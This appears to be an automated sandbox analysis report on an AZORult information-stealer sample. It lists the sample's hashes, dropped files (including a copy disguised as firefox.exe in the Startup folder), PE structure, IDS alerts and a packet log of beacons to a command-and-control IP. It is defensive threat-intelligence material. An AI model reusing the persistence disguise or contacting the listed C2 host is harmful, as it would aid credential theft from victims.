Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	326144
Entropy (8bit):	7.546930516725578
Encrypted:	false
SSDEEP:	6144:Cwjj8Ooo4YCv2nMDXcocYk3LXNiTG+q8CuyEIzkOV1NX8EXSn9lkbQaRc8uWor:CwjHEM2XcfY4zNirgCIz5R8EX0kbXcB/
MD5:	74039AD774774D76DBA815FF486BBD03
SHA1:	922749D681ACC93EBA5C94DABEF3DC4D999B0C59
SHA-256:	83EAAE959CB35CD1D132562C7D49285ABEDCE511C9F28244894ABA725EBFFE58
SHA-512:	A2E8A71074758820763FB8CAC913A35758FD6F7780E9E0ED7C75D80011118B3233627FEBC4BA0A1329BBECB22258DE5526038EABF354150710B70930F13D2B71
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............6..........,1..............................................&.(......".......".(.....Vs....(....t.........v..}.....(......(....&.(.....f.r...p.r...p.(1...(2......N.s3...}.....(.....j.(4.....(5....s....(6....N.s3...}.....(.....N.s3...}.....(......(.........N.s3...}.....(......0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+....0..!........(....r5..p~....o......t.....+......0...........~.....+..*..0..+.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.546930516725578
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jd4t3R7hOq.exe
File size:	326'144 bytes
MD5:	74039ad774774d76dba815ff486bbd03
SHA1:	922749d681acc93eba5c94dabef3dc4d999b0c59
SHA256:	83eaae959cb35cd1d132562c7d49285abedce511c9f28244894aba725ebffe58
SHA512:	a2e8a71074758820763fb8cac913a35758fd6f7780e9e0ed7c75d80011118b3233627febc4ba0a1329bbecb22258de5526038eabf354150710b70930f13d2b71
SSDEEP:	6144:Cwjj8Ooo4YCv2nMDXcocYk3LXNiTG+q8CuyEIzkOV1NX8EXSn9lkbQaRc8uWor:CwjHEM2XcfY4zNirgCIz5R8EX0kbXcB/
TLSH:	0264D03A65F16544E47FE7FBDEDD89800FA7742A54538B8D920A461F903E3A8ED10E32
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x450f0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x86919054 [Wed Jul 17 15:10:12 2041 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x50ebc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x5fe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x54000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4ef14	0x4f000	d37bc18a500f334bc533359951838b84	False	0.7340535996835443	SysEx File - Garfield	7.558302936908568	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x5fe	0x600	ca1fb908e9bab45ea24b3f17b3fffcda	False	0.435546875	data	4.202375980909549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x54000	0xc	0x200	f20a7ce3eab5d51b3864abfc581f20a9	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x520a0	0x374	data			0.42194570135746606
RT_MANIFEST	0x52414	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T19:12:27.962082+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.11	49726	104.21.75.48	80	TCP
2025-01-10T19:12:27.962082+0100	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.11	49726	104.21.75.48	80	TCP
2025-01-10T19:12:28.204288+0100	2029137	ET MALWARE AZORult v3.3 Server Response M2	1	104.21.75.48	80	192.168.2.11	49726	TCP
2025-01-10T19:12:36.052530+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.11	49767	104.21.75.48	80	TCP
2025-01-10T19:12:41.007516+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.11	49807	104.21.75.48	80	TCP
2025-01-10T19:12:41.007516+0100	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.11	49807	104.21.75.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:12:26.390994072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:26.395898104 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:26.396027088 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:26.396173000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:26.400947094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962011099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962030888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962044954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962080002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962081909 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.962091923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962105036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962115049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.962117910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962132931 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.962147951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.962157965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962189913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962202072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.962246895 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.962248087 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:27.966923952 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.966943979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:27.966989040 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.050470114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.050484896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.050534010 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.050561905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.050574064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.050586939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.050606966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.050621986 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.200572014 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.200588942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.200635910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.200670958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.200774908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.200817108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.200845957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.200881958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.200891972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.200922966 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.201122046 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201133013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201144934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201158047 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.201173067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.201198101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201210022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201229095 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.201246977 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.201944113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.201982975 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202007055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202018023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202043056 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202059031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202538967 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202554941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202568054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202574015 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202580929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202589035 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202591896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.202605009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.202630997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.203362942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.203375101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.203386068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.203401089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.203404903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.203414917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.203423023 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.203450918 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.204288006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.204299927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.204312086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.204324961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.204333067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.204355001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.205507040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.205549955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289119005 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289133072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289153099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289164066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289171934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289179087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289196968 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289244890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289263010 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289288998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289300919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289307117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289325953 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289436102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289458036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289469957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289470911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289493084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.289494038 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289506912 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.289531946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444195032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444207907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444220066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444236994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444266081 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444313049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444314003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444325924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444343090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444350958 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444377899 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444447041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444468021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444488049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444489002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444499969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444521904 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444545031 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444693089 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444705009 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444716930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444736004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444750071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444766045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444804907 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444824934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444835901 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444870949 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444891930 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444931984 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.444940090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444951057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444962025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.444982052 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445008993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445271969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445283890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445297003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445317984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445327997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445329905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445343018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445354939 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445374012 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445395947 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445401907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445436954 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445660114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445672035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445710897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445735931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445748091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445763111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445771933 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445791006 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445858955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445871115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445882082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445894957 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445899010 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445919037 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445956945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.445986986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.445998907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446011066 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446022987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446028948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446033955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446047068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446048975 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446070910 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446099997 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446649075 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446660995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446675062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446701050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446717978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446785927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446796894 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446809053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446821928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446822882 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446849108 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446873903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446877956 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446888924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446901083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446913958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446928024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446948051 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446976900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.446983099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.446989059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.447000980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.447043896 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.532754898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.532816887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.532830954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.532843113 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:28.532869101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:28.532881021 CET	49726	80	192.168.2.11	104.21.75.48
